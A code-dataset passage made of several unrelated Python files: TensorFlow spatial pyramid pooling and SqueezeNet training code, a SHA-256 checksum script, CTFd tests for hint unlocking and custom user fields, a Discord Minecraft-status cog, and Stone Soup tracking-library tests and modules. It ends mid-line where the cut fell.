Pyramid Pooling in Deep Convolutional Networks for Visual Recognition. https://arxiv.org/pdf/1406.4729.pdf. Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c """ inputs_shape = tf.shape(inputs) h = tf.cast(tf.gather(inputs_shape, 1), tf.int32) w = tf.cast(tf.gather(inputs_shape, 2), tf.int32) if mode == 'max': pooling_op = tf.reduce_max elif mode == 'avg': pooling_op = tf.reduce_mean else: msg = "Mode must be either 'max' or 'avg'. Got '{0}'" raise ValueError(msg.format(mode)) result = [] n = output_size for row in range(output_size): for col in range(output_size): # start_h = floor(row / n * h) start_h = tf.cast(tf.floor(tf.multiply(tf.divide(row, n), tf.cast(h, tf.float32))), tf.int32) # end_h = ceil((row + 1) / n * h) end_h = tf.cast(tf.ceil(tf.multiply(tf.divide((row + 1), n), tf.cast(h, tf.float32))), tf.int32) # start_w = floor(col / n * w) start_w = tf.cast(tf.floor(tf.multiply(tf.divide(col, n), tf.cast(w, tf.float32))), tf.int32) # end_w = ceil((col + 1) / n * w) end_w = tf.cast(tf.ceil(tf.multiply(tf.divide((col + 1), n), tf.cast(w, tf.float32))), tf.int32) pooling_region = inputs[:, start_h:end_h, start_w:end_w, :] pool_result = pooling_op(pooling_region, axis=(1, 2)) result.append(pool_result) return result def spatial_pyramid_pool(inputs, dimensions=[2,1], mode='max', implementation='kaiming'): """ Performs spatial pyramid pooling (SPP) over the input. It will turn a 2D input of arbitrary size into an output of fixed dimenson. Hence, the convlutional part of a DNN can be connected to a dense part with a fixed number of nodes even if the dimensions of the input image are unknown. The pooling is performed over :math:`l` pooling levels. Each pooling level :math:`i` will create :math:`M_i` output features. :math:`M_i` is given by :math:`n_i * n_i`, with :math:`n_i` as the number of pooling operations per dimension level :math:`i`. The length of the parameter dimensions is the level of the spatial pyramid. Args: inputs: A 4D Tensor (B, H, W, C). dimensions: The list of :math:`n_i`'s that define the output dimension of each pooling level :math:`i`. The length of dimensions is the level of the spatial pyramid. mode: Pooling mode 'max' or 'avg'. implementation: The implementation to use, either 'kaiming' or 'fast'. kamming is the original implementation from the paper, and supports variable sizes of input vectors, which fast does not support. Returns: A fixed length vector representing the inputs. Notes: SPP should be inserted between the convolutional part of a DNN and it's dense part. Convolutions can be used for arbitrary input dimensions, but the size of their output will depend on their input dimensions. Connecting the output of the convolutional to the dense part then usually demands us to fix the dimensons of the network's input. The spatial pyramid pooling layer, however, allows us to leave the network input dimensions arbitrary. The advantage over a global pooling layer is the added robustness against object deformations due to the pooling on different scales. References: [1] <NAME> et al (2015): Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition. https://arxiv.org/pdf/1406.4729.pdf. Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c """ pool_list = [] if implementation == 'kaiming': for pool_dim in dimensions: pool_list += max_pool_2d_nxn_regions(inputs, pool_dim, mode) else: shape = inputs.get_shape().as_list() for d in dimensions: h = shape[1] w = shape[2] ph = np.ceil(h * 1.0 / d).astype(np.int32) pw = np.ceil(w * 1.0 / d).astype(np.int32) sh = np.floor(h * 1.0 / d + 1).astype(np.int32) sw = np.floor(w * 1.0 / d + 1).astype(np.int32) pool_result = tf.nn.max_pool(inputs, ksize=[1, ph, pw, 1], strides=[1, sh, sw, 1], padding='SAME') pool_list.append(tf.reshape(pool_result, [tf.shape(inputs)[0], -1])) return tf.concat(pool_list, 0) ``` #### File: tensorflow-layers-examples/scripts/train_squeezenet.py ```python import sys, os sys.path.append("./scripts/data_loader") sys.path.append("./models") from mnist_loader import load_data from squeeze_net import squeeze_net from preprocessor_example import mnist_batch_input_fn, minibatch_loader import functools import tensorflow as tf from tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib tf.logging.set_verbosity(tf.logging.INFO) n_class = 10 # define model def model_fn(features, labels, mode): # you need to convert labels to one_hot for accuracy metrics. # (input of accuracy metrics must be vector of scala labels.) labels = tf.one_hot(labels, depth=n_class) predictions, loss, train_op = squeeze_net(features, labels, mode, n_class) # return return model_fn_lib.ModelFnOps( mode=mode, predictions=predictions, loss=loss, train_op=train_op) def main(unused_argv): # train_data, train_labels, eval_data, eval_labels = load_data("./data/mnist") mnist = load_data("./data/mnist") # create Estimator run_config = tf.contrib.learn.RunConfig(save_summary_steps=10) classifier = tf.contrib.learn.Estimator( model_fn=model_fn, model_dir="./results/models/squeeze_net", config=run_config) # setting log tensors_to_log = {"probabilities": "softmax_tensor", "classes": "argmax_tensor"} logging_hook = tf.train.LoggingTensorHook( tensors=tensors_to_log, every_n_iter=50) img_pointer_name = 'image_pointer' label_file_name = 'labels' data_root = './data' img_pointer_path = os.path.join(data_root, img_pointer_name) label_file_path = os.path.join(data_root, label_file_name) # learning classifier.fit( # input_fn=lambda: mnist_batch_input_fn(mnist[:2]), input_fn=lambda: minibatch_loader( \ img_pointer_path, label_file_path, data_root, \ n_class=10, batch_size=100, num_epochs=10), monitors=[logging_hook] ) metrics = { "accuracy": tf.contrib.learn.MetricSpec( metric_fn=tf.metrics.accuracy, prediction_key="classes", ) } # evaluate eval_results = classifier.evaluate( # input_fn=lambda: mnist_batch_input_fn(mnist[2:]), input_fn=lambda: minibatch_loader( \ img_pointer_path, label_file_path, data_root, \ n_class=10, batch_size=1, num_epochs=1), metrics=metrics ) print(eval_results) if __name__ == "__main__": tf.app.run() ```
{ "source": "0sifr/comparachecksum", "score": 3 }
#### File: comparachecksum/codebase/sha256.py ```python import hashlib import sys def sha256_checksum(filename, block_size=65536): sha256 = hashlib.sha256() with open(filename, 'rb') as f: for block in iter(lambda: f.read(block_size), b''): sha256.update(block) return sha256.hexdigest() def main(): for f in sys.argv[1:]: checksum = sha256_checksum(f) print(f + '\t' + checksum) if __name__ == '__main__': main() ```
{ "source": "0skAr-alws/CTFd", "score": 2 }
#### File: tests/teams/test_hints.py ```python from CTFd.utils.scores import get_standings from tests.helpers import ( create_ctfd, destroy_ctfd, gen_award, gen_challenge, gen_hint, gen_team, gen_user, login_as_user, ) def test_hint_team_unlock(): """Is a user's unlocked hint reflected on other team members""" app = create_ctfd(user_mode="teams") with app.app_context(): user = gen_user(app.db) second_user = gen_user(app.db, name="user", email="<EMAIL>") team = gen_team(app.db) user.team_id = team.id second_user.team_id = team.id team.members.append(user) team.members.append(second_user) chal = gen_challenge(app.db) gen_hint(app.db, chal.id, content="hint", cost=1, type="standard") # Give the points to the user that doesn't unlock # Users that unlock hints should be able to unlock but cost their team points gen_award(app.db, user_id=3, team_id=team.id) app.db.session.commit() with login_as_user(app, name="user_name") as client: # Assert that we don't see a hint r = client.get("/api/v1/hints/1") assert r.get_json()["data"].get("content") is None # Unlock the hint client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"}) # Assert that we see a hint r = client.get("/api/v1/hints/1") assert r.get_json()["data"].get("content") with login_as_user(app) as second_client: # Assert that we see a hint r = second_client.get("/api/v1/hints/1") assert r.get_json()["data"].get("content") # Assert that we can't double unlock r = second_client.post( "/api/v1/unlocks", json={"target": 1, "type": "hints"} ) assert r.status_code == 400 assert ( r.get_json()["errors"]["target"] == "You've already unlocked this this target" ) # Assert that we see a hint r = second_client.get("/api/v1/hints/1") assert r.json["data"]["content"] == "hint" # Verify standings # We start with 100 points from the award. # We lose a point because we unlock successfully once standings = get_standings() assert standings[0][2] == "team_name" assert standings[0][3] == 99 destroy_ctfd(app) def test_hint_team_unlocking_without_points(): """Test that teams cannot enter negative point valuations from unlocking hints""" app = create_ctfd(user_mode="teams") with app.app_context(): user = gen_user(app.db) second_user = gen_user(app.db, name="user", email="<EMAIL>") team = gen_team(app.db) user.team_id = team.id second_user.team_id = team.id team.members.append(user) team.members.append(second_user) chal = gen_challenge(app.db) gen_hint(app.db, chal.id, content="hint", cost=1, type="standard") app.db.session.commit() with login_as_user(app, name="user_name") as client: # Assert that we don't see a hint r = client.get("/api/v1/hints/1") assert r.get_json()["data"].get("content") is None # Attempt to unlock the hint r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"}) assert r.status_code == 400 assert ( r.get_json()["errors"]["score"] == "You do not have enough points to unlock this hint" ) destroy_ctfd(app) def test_teams_dont_prevent_other_teams_from_unlocking_hints(): """Unlocks from one user don't affect other users""" app = create_ctfd(user_mode="teams") with app.app_context(): chal = gen_challenge(app.db) gen_hint(app.db, chal.id, content="This is a hint", cost=1, type="standard") team1 = gen_team(app.db, name="team1", email="<EMAIL>") team2 = gen_team(app.db, name="team2", email="<EMAIL>") # Give users points with an award gen_award(app.db, user_id=team1.captain_id) gen_award(app.db, user_id=team2.captain_id) captain1 = team1.captain.name captain2 = team2.captain.name app.db.session.commit() # First team unlocks hint with login_as_user(app, name=captain1) as client: r = client.get("/api/v1/hints/1") assert r.status_code == 200 r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"}) assert r.status_code == 200 r = client.get("/api/v1/hints/1") assert r.status_code == 200 # Second team unlocks hint with login_as_user(app, name=captain2) as client: r = client.get("/api/v1/hints/1") assert r.status_code == 200 r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"}) assert r.status_code == 200 r = client.get("/api/v1/hints/1") assert r.status_code == 200 destroy_ctfd(app) ``` #### File: tests/users/test_fields.py ```python from CTFd.models import UserFieldEntries from tests.helpers import ( create_ctfd, destroy_ctfd, gen_field, login_as_user, register_user, ) def test_new_fields_show_on_pages(): app = create_ctfd() with app.app_context(): register_user(app) gen_field(app.db) with app.test_client() as client: r = client.get("/register") assert "CustomField" in r.get_data(as_text=True) assert "CustomFieldDescription" in r.get_data(as_text=True) with login_as_user(app) as client: r = client.get("/settings") assert "CustomField" in r.get_data(as_text=True) assert "CustomFieldDescription" in r.get_data(as_text=True) r = client.patch( "/api/v1/users/me", json={"fields": [{"field_id": 1, "value": "CustomFieldEntry"}]}, ) resp = r.get_json() assert resp["success"] is True assert resp["data"]["fields"][0]["value"] == "CustomFieldEntry" assert resp["data"]["fields"][0]["description"] == "CustomFieldDescription" assert resp["data"]["fields"][0]["name"] == "CustomField" assert resp["data"]["fields"][0]["field_id"] == 1 r = client.get("/user") resp = r.get_data(as_text=True) assert "CustomField" in resp assert "CustomFieldEntry" in resp r = client.get("/users/2") resp = r.get_data(as_text=True) assert "CustomField" in resp assert "CustomFieldEntry" in resp destroy_ctfd(app) def test_fields_required_on_register(): app = create_ctfd() with app.app_context(): gen_field(app.db) with app.app_context(): with app.test_client() as client: client.get("/register") with client.session_transaction() as sess: data = { "name": "user", "email": "<EMAIL>", "password": "password", "nonce": sess.get("nonce"), } client.post("/register", data=data) with client.session_transaction() as sess: assert sess.get("id") is None with client.session_transaction() as sess: data = { "name": "user", "email": "<EMAIL>", "password": "password", "fields[1]": "custom_field_value", "nonce": sess.get("nonce"), } client.post("/register", data=data) with client.session_transaction() as sess: assert sess["id"] destroy_ctfd(app) def test_fields_properties(): app = create_ctfd() with app.app_context(): register_user(app) gen_field( app.db, name="CustomField1", required=True, public=True, editable=True ) gen_field( app.db, name="CustomField2", required=False, public=True, editable=True ) gen_field( app.db, name="CustomField3", required=False, public=False, editable=True ) gen_field( app.db, name="CustomField4", required=False, public=False, editable=False ) with app.test_client() as client: r = client.get("/register") resp = r.get_data(as_text=True) assert "CustomField1" in resp assert "CustomField2" in resp assert "CustomField3" in resp assert "CustomField4" in resp with login_as_user(app) as client: r = client.get("/settings") resp = r.get_data(as_text=True) assert "CustomField1" in resp assert "CustomField2" in resp assert "CustomField3" in resp assert "CustomField4" not in resp r = client.patch( "/api/v1/users/me", json={ "fields": [ {"field_id": 1, "value": "CustomFieldEntry1"}, {"field_id": 2, "value": "CustomFieldEntry2"}, {"field_id": 3, "value": "CustomFieldEntry3"}, {"field_id": 4, "value": "CustomFieldEntry4"}, ] }, ) resp = r.get_json() assert resp == { "success": False, "errors": {"fields": ["Field 'CustomField4' cannot be editted"]}, } r = client.patch( "/api/v1/users/me", json={ "fields": [ {"field_id": 1, "value": "CustomFieldEntry1"}, {"field_id": 2, "value": "CustomFieldEntry2"}, {"field_id": 3, "value": "CustomFieldEntry3"}, ] }, ) assert r.status_code == 200 r = client.get("/user") resp = r.get_data(as_text=True) assert "CustomField1" in resp assert "CustomField2" in resp assert "CustomField3" not in resp assert "CustomField4" not in resp r = client.get("/users/2") resp = r.get_data(as_text=True) assert "CustomField1" in resp assert "CustomField2" in resp assert "CustomField3" not in resp assert "CustomField4" not in resp destroy_ctfd(app) def test_boolean_checkbox_field(): app = create_ctfd() with app.app_context(): gen_field(app.db, name="CustomField1", field_type="boolean", required=False) with app.test_client() as client: r = client.get("/register") resp = r.get_data(as_text=True) # We should have rendered a checkbox input assert "checkbox" in resp with client.session_transaction() as sess: data = { "name": "user", "email": "<EMAIL>", "password": "password", "nonce": sess.get("nonce"), "fields[1]": "y", } client.post("/register", data=data) with client.session_transaction() as sess: assert sess["id"] assert UserFieldEntries.query.count() == 1 assert UserFieldEntries.query.filter_by(id=1).first().value is True with login_as_user(app) as client: r = client.get("/settings") resp = r.get_data(as_text=True) assert "CustomField1" in resp assert "checkbox" in resp r = client.patch( "/api/v1/users/me", json={"fields": [{"field_id": 1, "value": False}]} ) assert r.status_code == 200 assert UserFieldEntries.query.count() == 1 assert UserFieldEntries.query.filter_by(id=1).first().value is False destroy_ctfd(app) ```
{ "source": "0skis/bot", "score": 3 }
#### File: bot/cogs/minecraft.py ```python from discord.ext import commands from mcstatus import MinecraftServer class Minecraft(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command(name='minecraft', aliases=['ping'], help='Se om nån server är uppe och om nån fellow gamer är online') async def _minecraft(self, ctx, *, msg: str): for ip in msg.split(): if ':' in ip: address = ip else: address = f'{ip}:25565' try: server = MinecraftServer.lookup(address) status = server.status() await ctx.send(f'{address} has {status.players.online} players and replied in {status.latency} ms') except: await ctx.send(f'{address} is offline') def setup(bot): bot.add_cog(Minecraft(bot)) ```
{ "source": "0sm1um/Stone-Soup", "score": 2 }
#### File: hypothesiser/tests/test_composite.py ```python import datetime import numpy as np import pytest from ..categorical import HMMHypothesiser from ..composite import CompositeHypothesiser from ..probability import PDAHypothesiser from ...models.measurement.categorical import MarkovianMeasurementModel from ...predictor.composite import CompositePredictor from ...types.detection import Detection, MissedDetection, CompositeDetection, CategoricalDetection from ...types.hypothesis import CompositeHypothesis, CompositeProbabilityHypothesis from ...types.multihypothesis import MultipleHypothesis from ...types.state import GaussianState, CompositeState, CategoricalState from ...types.track import Track def make_categorical_measurement_model(ndim_state, ndim_meas): E = np.random.rand(ndim_state, ndim_meas) model = MarkovianMeasurementModel(emission_matrix=E) return model def test_composite(predictor, updater, dummy_category_predictor, dummy_category_updater): sub_hypothesisers = [ PDAHypothesiser(predictor, updater, clutter_spatial_density=1.2e-2, prob_detect=0.9, prob_gate=0.99), HMMHypothesiser(dummy_category_predictor, dummy_category_updater, prob_detect=0.7, prob_gate=0.95), PDAHypothesiser(predictor, updater, clutter_spatial_density=1.4e-2, prob_detect=0.5, prob_gate=0.98), HMMHypothesiser(dummy_category_predictor, dummy_category_updater, prob_detect=0.8, prob_gate=0.97) ] # Test instantiation errors with pytest.raises(ValueError, match="Cannot create an empty composite hypothesiser"): CompositeHypothesiser(sub_hypothesisers=list()) with pytest.raises(ValueError, match="All sub-hypothesisers must be a hypothesiser type"): CompositeHypothesiser(sub_hypothesisers + [1, 2, 3]) hypothesiser = CompositeHypothesiser(sub_hypothesisers=sub_hypothesisers) # Test composite predictor and updater expected_predictors = [sub_hyp.predictor for sub_hyp in sub_hypothesisers] assert isinstance(hypothesiser.predictor, CompositePredictor) assert hypothesiser.predictor.sub_predictors == expected_predictors then = datetime.datetime.now() now = then + datetime.timedelta(seconds=5) track = Track([CompositeState([GaussianState([0, 1, 0, 1], 0.1 * np.eye(4)), CategoricalState([0.2, 0.2, 0.2, 0.2, 0.2]), GaussianState([3, 4, 5], 0.2 * np.eye(3)), CategoricalState([0.3, 0.4, 0.3])], default_timestamp=then)]) detection1 = CompositeDetection([Detection([3, 3, 3, 3], timestamp=now), CategoricalDetection(np.random.rand(2), timestamp=now), Detection([2, 4, 6], timestamp=now), CategoricalDetection(np.random.rand(2), timestamp=now)], mapping=[0, 1, 2, 3]) detection2 = CompositeDetection([Detection([4, 4, 4, 4], timestamp=now), CategoricalDetection(np.random.rand(2), timestamp=now), CategoricalDetection(np.random.rand(2), timestamp=now)], mapping=[0, 1, 3]) detection3 = CompositeDetection([CategoricalDetection(np.random.rand(2), timestamp=now), CategoricalDetection(np.random.rand(2), timestamp=now)], mapping=[3, 1]) detections = {detection1, detection2, detection3} multi_hypothesis = hypothesiser.hypothesise(track, detections, now) # Test all hypotheses are composite assert all({isinstance(hypothesis, CompositeHypothesis) for hypothesis in multi_hypothesis}) # Test all detections considered hyp_detections = {hypothesis.measurement for hypothesis in multi_hypothesis} for detection in detections: assert detection in hyp_detections # Test hypothesis for every detection assert len(multi_hypothesis) == len(detections) + 1 # Test detections completely present in corresponding hypotheses for detection in detections: det_hyp = None count = 0 for hyp in multi_hypothesis: if hyp.measurement == detection: det_hyp = hyp count += 1 assert det_hyp is not None assert count == 1 assert isinstance(det_hyp, CompositeProbabilityHypothesis) # test mapping correct for i, sub_det_hyp in enumerate(det_hyp): try: mapping_index = detection.mapping.index(i) except ValueError: assert isinstance(sub_det_hyp.measurement, MissedDetection) else: assert sub_det_hyp.measurement == detection[mapping_index] # Test normalised assert pytest.approx(sum({hyp.probability for hyp in multi_hypothesis})) == 1 sub_hyps_prob_sum = 0 for hyp in multi_hypothesis: prod = 1 for sub_hyp in hyp: prod *= sub_hyp.probability sub_hyps_prob_sum += prod # Test no detections empty_hypotheses = hypothesiser.hypothesise(track, set(), now) assert isinstance(empty_hypotheses, MultipleHypothesis) assert len(empty_hypotheses) == 1 null_hyp = next(iter(empty_hypotheses)) assert not null_hyp # Test contains for sub_hypothesiser in sub_hypothesisers: assert sub_hypothesiser in hypothesiser assert PDAHypothesiser(predictor, updater, clutter_spatial_density=1, prob_detect=1, prob_gate=1) not in hypothesiser assert 'a' not in hypothesiser # Test get for i, expected_hypothesiser in enumerate(sub_hypothesisers): assert hypothesiser[i] == expected_hypothesiser # Test get slice hypothesiser_slice = hypothesiser[1:] assert isinstance(hypothesiser_slice, CompositeHypothesiser) assert hypothesiser_slice.sub_hypothesisers == sub_hypothesisers[1:] # Test iter for i, exp_sub_hypothesiser in enumerate(hypothesiser): assert exp_sub_hypothesiser == sub_hypothesisers[i] # Test len assert len(hypothesiser) == 4 ``` #### File: measurement/tests/test_categorical.py ```python import numpy as np import pytest from ....models.measurement.categorical import MarkovianMeasurementModel from ....types.array import StateVector from ....types.state import CategoricalState def test_categorical_measurement_model(): # 3 hidden categories, 4 measurement categories E = np.array([[30, 25, 5], [20, 25, 10], [10, 25, 80], [40, 25, 5]]) # Test mismatched number of category names with pytest.raises(ValueError, match="ndim_meas of 4 does not match number of measurement " "categories 2"): MarkovianMeasurementModel(E, measurement_categories=['red', 'blue']) model = MarkovianMeasurementModel(E) # Test default category names assert model.measurement_categories == ['0', '1', '2', '3'] # Test normalised expected_array = np.array([[3 / 10, 1 / 4, 1 / 20], [2 / 10, 1 / 4, 2 / 20], [1 / 10, 1 / 4, 16 / 20], [4 / 10, 1 / 4, 1 / 20]]) assert np.allclose(model.emission_matrix, expected_array) # Test ndim assert model.ndim_state == 3 assert model.ndim_meas == 4 state = CategoricalState([80, 10, 10]) # Test function new_vector = model.function(state, noise=False) assert isinstance(new_vector, StateVector) assert new_vector.shape[0] == 4 assert np.isclose(np.sum(new_vector), 1) # Test mapping assert np.array_equal(model.mapping, [0, 1, 2]) ``` #### File: transition/tests/test_categorical.py ```python from datetime import datetime, timedelta import numpy as np from ..categorical import MarkovianTransitionModel from ....types.array import StateVector from ....types.state import CategoricalState def test_categorical_transition_model(): # 3 categories F = np.array([[50, 5, 30], [25, 90, 30], [25, 5, 30]]) model = MarkovianTransitionModel(F) # Test normalised expected_array = np.array([[2 / 4, 1 / 20, 1 / 3], [1 / 4, 18 / 20, 1 / 3], [1 / 4, 1 / 20, 1 / 3]]) assert np.allclose(model.transition_matrix, expected_array) # Test ndim assert model.ndim == 3 assert model.ndim_state == 3 state = CategoricalState([80, 10, 10], timestamp=datetime.now()) # Test function (noiseless) new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=False) assert isinstance(new_vector, StateVector) assert new_vector.shape[0] == 3 assert np.isclose(np.sum(new_vector), 1) # Test function (noisy) new_vector = model.function(state, time_interval=timedelta(seconds=1), noise=True) assert isinstance(new_vector, StateVector) assert new_vector.shape[0] == 3 assert np.count_nonzero(new_vector) == 1 # basis vector # Test 0 time-interval function new_vector = model.function(state, time_interval=timedelta(seconds=0)) assert np.allclose(new_vector, state.state_vector) # Test no time-interval new_vector = model.function(state) assert np.allclose(new_vector, state.state_vector) ``` #### File: stonesoup/predictor/categorical.py ```python from ..base import Property from ..models.transition.categorical import MarkovianTransitionModel from ..predictor import Predictor from ..predictor._utils import predict_lru_cache from ..types.prediction import Prediction class HMMPredictor(Predictor): r"""Hidden Markov model predictor Assumes transition model is time-invariant, and therefore care should be taken when predicting forward to the same time.""" transition_model: MarkovianTransitionModel = Property( doc="The transition model used to predict states forward in `time`." ) @predict_lru_cache() def predict(self, prior, timestamp=None, **kwargs): r"""Predicts a :class:`~.CategoricalState` forward using the :attr:`transition_model`. Parameters ---------- prior : :class:`~.CategoricalState` :math:`\alpha_{t-1}` timestamp : :class:`datetime.datetime`, optional :math:`t` **kwargs : These are passed to the :meth:`transition_model.function` method. Returns ------- : :class:`~.CategoricalStatePrediction` The predicted state. Notes ----- The Markovian transition model is time-invariant and the evaluated `time_interval` can be `None`. """ predict_over_interval = self._predict_over_interval(prior, timestamp) prediction_vector = self.transition_model.function(prior, time_interval=predict_over_interval, **kwargs) return Prediction.from_state(prior, prediction_vector, timestamp=timestamp, transition_model=self.transition_model) def _predict_over_interval(self, prior, timestamp): """Private method to get the prediction interval (or None) Parameters ---------- prior : :class:`~.State` The prior state timestamp : :class:`datetime.datetime`, optional The (current) timestamp Returns ------- : :class:`datetime.timedelta` time interval to predict over """ # Deal with undefined timestamps if timestamp is None or prior.timestamp is None: predict_over_interval = None else: predict_over_interval = timestamp - prior.timestamp return predict_over_interval ``` #### File: stonesoup/predictor/particle.py ```python from .base import Predictor from ._utils import predict_lru_cache from .kalman import KalmanPredictor, ExtendedKalmanPredictor from ..base import Property from ..types.prediction import Prediction from ..types.state import GaussianState class ParticlePredictor(Predictor): """ParticlePredictor class An implementation of a Particle Filter predictor. """ @predict_lru_cache() def predict(self, prior, control_input=None, timestamp=None, **kwargs): """Particle Filter prediction step Parameters ---------- prior : :class:`~.ParticleState` A prior state object control_input : :class:`~.State`, optional The control input. It will only have an effect if :attr:`control_model` is not `None` (the default is `None`) timestamp: :class:`datetime.datetime`, optional A timestamp signifying when the prediction is performed (the default is `None`) Returns ------- : :class:`~.ParticleStatePrediction` The predicted state """ # Compute time_interval try: time_interval = timestamp - prior.timestamp except TypeError: # TypeError: (timestamp or prior.timestamp) is None time_interval = None new_state_vector = self.transition_model.function( prior, noise=True, time_interval=time_interval, num_samples=len(prior), **kwargs) return Prediction.from_state(prior, state_vector=new_state_vector, weight=prior.weight, timestamp=timestamp, particle_list=None, transition_model=self.transition_model) class ParticleFlowKalmanPredictor(ParticlePredictor): """Gromov Flow Parallel Kalman Particle Predictor This is a wrapper around the :class:`~.GromovFlowParticlePredictor` which can use a :class:`~.ExtendedKalmanPredictor` or :class:`~.UnscentedKalmanPredictor` in parallel in order to maintain a state covariance, as proposed in [1]_. This should be used in conjunction with the :class:`~.ParticleFlowKalmanUpdater`. Parameters ---------- References ---------- .. [1] <NAME>, <NAME>., "Implementation of the Daum-Huang Exact-Flow Particle Filter" 2012 """ kalman_predictor: KalmanPredictor = Property( default=None, doc="Kalman predictor to use. Default `None` where a new instance of" ":class:`~.ExtendedKalmanPredictor` will be created utilising the" "same transition model.") def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.kalman_predictor is None: self.kalman_predictor = ExtendedKalmanPredictor( self.transition_model) def predict(self, prior, *args, **kwargs): particle_prediction = super().predict(prior, *args, **kwargs) kalman_prediction = self.kalman_predictor.predict( GaussianState(prior.state_vector, prior.covar, prior.timestamp), *args, **kwargs) return Prediction.from_state(prior, state_vector=particle_prediction.state_vector, weight=particle_prediction.weight, timestamp=particle_prediction.timestamp, fixed_covar=kalman_prediction.covar, particle_list=None, transition_model=self.transition_model) ``` #### File: sensor/action/__init__.py ```python import datetime from abc import abstractmethod from typing import Iterator, Any from ...base import Base, Property class Action(Base): """The base class for an action that can be taken by a sensor or platform with an :class:`~.ActionableProperty`.""" generator: Any = Property(default=None, readonly=True, doc="Action generator that created the action.") end_time: datetime.datetime = Property(readonly=True, doc="Time at which modification of the " "attribute ends.") target_value: Any = Property(doc="Target value.") def act(self, current_time, timestamp, init_value): """Return the attribute modified. Parameters ---------- current_time: datetime.datetime Current time timestamp: datetime.datetime Modification of attribute ends at this time stamp init_value: Any Current value of the modifiable attribute Returns ------- Any The new value of the attribute """ raise NotImplementedError() def __eq__(self, other): if not isinstance(other, type(self)): return False return all(getattr(self, name) == getattr(other, name) for name in type(self).properties) def __hash__(self): return hash(tuple(getattr(self, name) for name in type(self).properties)) class ActionGenerator(Base): """The base class for an action generator.""" owner: object = Property(doc="Actionable object that has the attribute to be modified.") attribute: str = Property(doc="The name of the attribute to be modified.") start_time: datetime.datetime = Property(doc="Start time of action.") end_time: datetime.datetime = Property(doc="End time of action.") resolution: float = Property(default=None, doc="Resolution of action space") @abstractmethod def __contains__(self, item): raise NotImplementedError() @abstractmethod def __iter__(self) -> Iterator[Action]: raise NotImplementedError() @property def current_value(self): return getattr(self.owner, self.attribute) @property def default_action(self): """The default action to modify the property if there is no given action.""" raise NotImplementedError() class RealNumberActionGenerator(ActionGenerator): """Action generator where action is a choice of a real number.""" @property @abstractmethod def initial_value(self): raise NotImplementedError @property @abstractmethod def min(self): raise NotImplementedError @property @abstractmethod def max(self): raise NotImplementedError ``` #### File: stonesoup/sensor/categorical.py ```python from scipy.stats import multinomial from ..base import Property from ..models.measurement.categorical import MarkovianMeasurementModel from ..sensor.sensor import Sensor from ..types.array import StateVector from ..types.detection import TrueCategoricalDetection class HMMSensor(Sensor): r"""Sensor model that observes a categorical state space and returns categorical measurements. Measurements are categorical distributions over a finite set of categories :math:`Z = \{\zeta^n|n\in \mathbf{N}, n\le N\}` (for some finite :math:`N`). """ measurement_model: MarkovianMeasurementModel = Property( doc="Measurement model to generate detection vectors from" ) @property def ndim_state(self): return self.measurement_model.ndim_state @property def ndim_meas(self): return self.measurement_model.ndim_meas def measure(self, ground_truths, noise: bool = True, **kwargs): r"""Generate a categorical measurement for a given set of true categorical state. Parameters ---------- ground_truths: Set[:class:`~.CategoricalGroundTruthState`] A set of :class:`~.CategoricalGroundTruthState`. noise: bool Indicates whether measurement vectors are sampled from and the resultant measurement categories returned instead. These are discrete categories instead of a distribution over the measurement space. They are represented by N-tuples, with all components equal to 0, except at an index corresponding to the relevant category. For example :math:`e^k` indicates that the measurement category is :math:`\zeta^k`. If `False`, the resultant distribution is returned. Returns ------- Set[:class:`~.TrueCategoricalDetection`] A set of measurements generated from the given states. The timestamps of the measurements are set equal to that of the corresponding states that they were calculated from. Each measurement stores the ground truth path that it was produced from. """ detections = set() for truth in ground_truths: timestamp = truth.timestamp detection_vector = self.measurement_model.function(truth, noise=noise, **kwargs) if noise: # Sample from resultant distribution rv = multinomial(n=1, p=detection_vector.flatten()) detection_vector = StateVector(rv.rvs(size=1, random_state=None)) detection = TrueCategoricalDetection( state_vector=detection_vector, timestamp=timestamp, categories=self.measurement_model.measurement_categories, measurement_model=self.measurement_model, groundtruth_path=truth ) detections.add(detection) return detections ``` #### File: tracker/tests/test_pointprocess.py ```python import datetime import numpy as np from ..pointprocess import PointProcessMultiTargetTracker from ...types.state import TaggedWeightedGaussianState from ...mixturereducer.gaussianmixture import GaussianMixtureReducer from ...updater.pointprocess import PHDUpdater from ...hypothesiser.gaussianmixture import GaussianMixtureHypothesiser from ...hypothesiser.distance import DistanceHypothesiser from ... import measures from ...models.measurement.linear import LinearGaussian from ...updater.kalman import KalmanUpdater def test_point_process_multi_target_tracker_cycle(detector, predictor): previous_time = datetime.datetime(2018, 1, 1, 13, 59) timestamp = datetime.datetime.now() birth_mean = np.array([[40]]) birth_covar = np.array([[1000]]) birth_component = TaggedWeightedGaussianState( birth_mean, birth_covar, weight=0.3, tag=TaggedWeightedGaussianState.BIRTH, timestamp=timestamp) # Initialise a Kalman Updater measurement_model = LinearGaussian(ndim_state=1, mapping=[0], noise_covar=np.array([[0.04]])) updater = KalmanUpdater(measurement_model=measurement_model) # Initialise a Gaussian Mixture hypothesiser measure = measures.Mahalanobis() base_hypothesiser = DistanceHypothesiser( predictor, updater, measure=measure, missed_distance=16) hypothesiser = GaussianMixtureHypothesiser(hypothesiser=base_hypothesiser, order_by_detection=True) # Initialise a Gaussian Mixture reducer merge_threshold = 4 prune_threshold = 1e-5 reducer = GaussianMixtureReducer(prune_threshold=prune_threshold, merge_threshold=merge_threshold) # Initialise a Point Process updater phd_updater = PHDUpdater(updater=updater, prob_detection=0.8) tracker = PointProcessMultiTargetTracker( detector=detector, updater=phd_updater, hypothesiser=hypothesiser, reducer=reducer, birth_component=birth_component ) for time, tracks in tracker: assert time == previous_time + datetime.timedelta(minutes=1) assert tracker.estimated_number_of_targets > 0 assert tracker.estimated_number_of_targets < 4 previous_time = time # Shouldn't have more than three active tracks assert (len(tracks) >= 1) & (len(tracks) <= 3) # All tracks should have unique IDs assert len(tracker.gaussian_mixture.component_tags) == 